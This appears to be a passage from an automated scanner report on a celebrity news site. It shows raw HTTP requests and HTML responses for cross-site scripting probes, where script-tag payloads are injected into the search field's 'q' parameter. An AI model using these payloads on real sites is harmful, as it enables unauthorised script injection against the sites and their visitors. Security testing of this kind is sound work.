src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/search;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/search;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/search;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Search+Page+http://insdr.co/taSort+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /><style type="text/css"> .gsc-control-cse { font-family: Arial, sans-serif; border-color: #FFFFFF; background-color: #FFFFFF; } input.gsc-input { border-color: #777777; } input.gsc-search-button { border-color: #333333; background-color: #333333; } .gsc-tabHeader.gsc-tabhInactive { border-color: #777777; background-color: #777777; } .gsc-tabHeader.gsc-tabhActive { border-color: #333333; background-color: #333333; } .gsc-tabsArea { border-color: #333333; } .gsc-webResult.gsc-result { border-color: #FFFFFF; background-color: #FFFFFF; } .gsc-webResult.gsc-result:hover { border-color: #000000; background-color: #FFFFFF; } .gs-webResult.gs-result a.gs-title:link, .gs-webResult.gs-result a.gs-title:link b { color: #444444; } .gs-webResult.gs-result a.gs-title:visited, .gs-webResult.gs-result a.gs-title:visited b { color: #444444; } .gs-webResult.gs-result a.gs-title:hover, .gs-webResult.gs-result a.gs-title:hover b { color: #444444; } .gs-webResult.gs-result a.gs-title:active, .gs-webResult.gs-result a.gs-title:active b { color: #777777; } .gsc-cursor-page { color: #444444; } a.gsc-trailing-more-results:link { color: #444444; } .gs-webResult .gs-snippet { color: #333333; } .gs-webResult div.gs-visibleUrl { color: #000000; } .gs-webResult div.gs-visibleUrl-short { color: #000000; } .gs-webResult div.gs-visibleUrl-short { display: none; } .gs-webResult div.gs-visibleUrl-long { display: block; } .gsc-cursor-box { border-color: #FFFFFF; } .gsc-results .gsc-cursor-page { border-color: #777777; background-color: #FFFFFF; } .gsc-results .gsc-cursor-page.gsc-cursor-current-page { border-color: #333333; background-color: #333333; } .gs-promotion { border-color: #CCCCCC; background-color: #E6E6E6; } .gs-promotion a.gs-title:link, .gs-promotion a.gs-title:link *, .gs-promotion .gs-snippet a:link { color: #0000CC; } .gs-promotion a.gs-title:visited, .gs-promotion a.gs-title:visited *, .gs-promotion .gs-snippet a:visited { color: #0000CC; } .gs-promotion a.gs-title:hover, .gs-promotion a.gs-title:hover *, .gs-promotion .gs-snippet a:hover { color: #444444; } .gs-promotion a.gs-title:active, .gs-promotion a.gs-title:active *, .gs-promotion .gs-snippet a:active { color: #00CC00; } .gs-promotion .gs-snippet, .gs-promotion .gs-title .gs-promotion-title-right, .gs-promotion .gs-title .gs-promotion-title-right * { color: #333333; } .gs-promotion .gs-visibleUrl, .gs-promotion .gs-visibleUrl-short { color: #00CC00; }#channel_title_bar { width: 707px; height: 51px; background-color: #000; margin-left: -5px !important; margin-bottom: 15px; -webkit-box-shadow: 0px 5px 15px black; -moz-box-shadow: 0px 5px 15px black; box-shadow: 0px 5px 15px black;}.channel_name_text { text-align: center; font-family: Futura, "Futura BT", "Century Gothic", Helvetica, "Helvetica Neue", Arial, sans-serif; padding-top: 10px;color:#fff;}.content_container:last-child {border: none;}.art_link {margin-bottom: 15px;}.content_container p {margin-bottom: 0px;}.content_container {padding-bottom: 10px;}.square_excerpt { margin-top: -15px; max-width: 260px; float: right;}.channel_img {max-width: 455px; max-height: 300px; margin: 0 15px;}#channel_title_bar { width: 707px; height: 51px; background-color: #000; margin-left: -5px !important; margin-bottom: 15px; -webkit-box-shadow: 0px 5px 15px black; -moz-box-shadow: 0px 5px 15px black; box-shadow: 0px 5px 15px black;}.channel_name_text { text-align: center; font-family: Futura, "Futura BT", "Century Gothic", Helvetica, "Helvetica Neue", Arial, sans-serif; padding-top: 10px; color:#fff;}#main_content { width: 1010px; padding:0;}#search_wrapper form {display:none !important;}h2.search_header {width:100%;float:left !important;margin:20px 0 10px 0;padding:0;}#cse {width:1000px;float:left !important;overflow:hidden;margin:10px 0;padding:0;}.cse .gsc-control-cse, .gsc-control-cse {padding:0 !important;width:980px;}#full_col {width:990px;overflow:hidden;display:block;margin:0 0 0 15px;padding:0;}</style> <!-- MAIN CONTENT --> <div id="main_content"> <!-- LEFT COLUMN --> <div id="full_col"> <h2 class="search_header">SEARCH RESULTS</h2><div id="cse">Loading</div><script src="http://www.google.com/jsapi" type="text/javascript"></script><script type="text/javascript"> google.load('search', '1', {language : 'en', style : google.loader.themes.MINIMALIST}); google.setOnLoadCallback(function() { var options = {}; options[google.search.Search.RESTRICT_EXTENDED_A..
- /search/index.html

/search/index.html

http://www.theinsider.com/search/index.html?sort=date-sdate

Parameters

Parameter Type Value
sort GET date-sdate
q POST '"--></style></script><script>alert(0x00301B)</script>
hq POST more:recent4

Request

POST /search/index.html?sort=date-sdate HTTP/1.1
Referer: http://www.theinsider.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.theinsider.com
Content-Length: 105
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

q='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00301B)%3c%2fscript%3e&hq=more%3arecent4

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:11:30 GMT
Content-Length: 6632
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Search Page - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="search" /> <meta name="date" content="2011-05-25 12:00:00" /><meta property="og:title" content="Search Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/search/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Search Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-25 12:00:00" /><Attribute name="sdate" value="20110525" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/search;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/search;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/search;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Search+Page+http://insdr.co/taSort+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /><style type="text/css"> .gsc-control-cse { font-family: Arial, sans-serif; border-color: #FFFFFF; background-color: #FFFFFF; } input.gsc-input { border-color: #777777; } input.gsc-search-button { border-color: #333333; background-color: #333333; } .gsc-tabHeader.gsc-tabhInactive { border-color: #777777; background-color: #777777; } .gsc-tabHeader.gsc-tabhActive { border-color: #333333; background-color: #333333; } .gsc-tabsArea { border-color: #333333; } .gsc-webResult.gsc-result { border-color: #FFFFFF; background-color: #FFFFFF; } .gsc-webResult.gsc-result:hover { border-color: #000000; background-color: #FFFFFF; } .gs-webResult.gs-result a.gs-title:link, .gs-webResult.gs-result a.gs-title:link b { color: #444444; } .gs-webResult.gs-result a.gs-title:visited, .gs-webResult.gs-result a.gs-title:visited b { color: #444444; } .gs-webResult.gs-result a.gs-title:hover, .gs-webResult.gs-result a.gs-title:hover b { color: #444444; } .gs-webResult.gs-result a.gs-title:active, .gs-webResult.gs-result a.gs-title:active b { color: #777777; } .gsc-cursor-page { color: #444444; } a.gsc-trailing-more-results:link { color: #444444; } .gs-webResult .gs-snippet { color: #333333; } .gs-webResult div.gs-visibleUrl { color: #000000; } .gs-webResult div.gs-visibleUrl-short { color: #000000; } .gs-webResult div.gs-visibleUrl-short { display: none; } .gs-webResult div.gs-visibleUrl-long { display: block; } .gsc-cursor-box { border-color: #FFFFFF; } .gsc-results .gsc-cursor-page { border-color: #777777; background-color: #FFFFFF; } .gsc-results .gsc-cursor-page.gsc-cursor-current-page { border-color: #333333; background-color: #333333; } .gs-promotion { border-color: #CCCCCC; background-color: #E6E6E6; } .gs-promotion a.gs-title:link, .gs-promotion a.gs-title:link *, .gs-promotion .gs-snippet a:link { color: #0000CC; } .gs-promotion a.gs-title:visited, .gs-promotion a.gs-title:visited *, .gs-promotion .gs-snippet a:visited { color: #0000CC; } .gs-promotion a.gs-title:hover, .gs-promotion a.gs-title:hover *, .gs-promotion .gs-snippet a:hover { color: #444444; } .gs-promotion a.gs-title:active, .gs-promotion a.gs-title:active *, .gs-promotion .gs-snippet a:active { color: #00CC00; } .gs-promotion .gs-snippet, .gs-promotion .gs-title .gs-promotion-title-right, .gs-promotion .gs-title .gs-promotion-title-right * { color: #333333; } .gs-promotion .gs-visibleUrl, .gs-promotion .gs-visibleUrl-short { color: #00CC00; }#channel_title_bar { width: 707px; height: 51px; background-color: #000; margin-left: -5px !important; margin-bottom: 15px; -webkit-box-shadow: 0px 5px 15px black; -moz-box-shadow: 0px 5px 15px black; box-shadow: 0px 5px 15px black;}.channel_name_text { text-align: center; font-family: Futura, "Futura BT", "Century Gothic", Helvetica, "Helvetica Neue", Arial, sans-serif; padding-top: 10px;color:#fff;}.content_container:last-child {border: none;}.art_link {margin-bottom: 15px;}.content_container p {margin-bottom: 0px;}.content_container {padding-bottom: 10px;}.square_excerpt { margin-top: -15px; max-width: 260px; float: right;}.channel_img {max-width: 455px; max-height: 300px; margin: 0 15px;}#channel_title_bar { width: 707px; height: 51px; background-color: #000; margin-left: -5px !important; margin-bottom: 15px; -webkit-box-shadow: 0px 5px 15px black; -moz-box-shadow: 0px 5px 15px black; box-shadow: 0px 5px 15px black;}.channel_name_text { text-align: center; font-family: Futura, "Futura BT", "Century Gothic", Helvetica, "Helvetica Neue", Arial, sans-serif; padding-top: 10px; color:#fff;}#main_content { width: 1010px; padding:0;}#search_wrapper form {display:none !important;}h2.search_header {width:100%;float:left !important;margin:20px 0 10px 0;padding:0;}#cse {width:1000px;float:left !important;overflow:hidden;margin:10px 0;padding:0;}.cse .gsc-control-cse, .gsc-control-cse {padding:0 !important;width:980px;}#full_col {width:990px;overflow:hidden;display:block;margin:0 0 0 15px;padding:0;}</style> <!-- MAIN CONTENT --> <div id="main_content"> <!-- LEFT COLUMN --> <div id="full_col"> <h2 class="search_header">SEARCH RESULTS</h2><div id="cse">Loading</div><script src="http://www.google.com/jsapi" type="text/javascript"></script><script type="text/javascript"> google.load('search', '1', {language : 'en', style : google.loader.themes.MINIMALIST}); google.setOnLoadCallback(function() { var options = {}; options[google.search.Search.RESTRICT_EXTENDED_A..
- /search/index.html

/search/index.html

http://www.theinsider.com/search/index.html?sort=date-sdate

Parameters

Parameter Type Value
sort GET date-sdate
q POST '"--></style></script><script>alert(0x00303F)</script>
hq POST more:recent4
sa.x POST 0
sa.y POST 0

Request

POST /search/index.html?sort=date-sdate HTTP/1.1
Referer: http://www.theinsider.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.theinsider.com
Content-Length: 119
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

q='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00303F)%3c%2fscript%3e&hq=more%3arecent4&sa.x=0&sa.y=0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:11:36 GMT
Content-Length: 6632
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Search Page - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="search" /> <meta name="date" content="2011-05-25 12:00:00" /><meta property="og:title" content="Search Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/search/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Search Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-25 12:00:00" /><Attribute name="sdate" value="20110525" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text 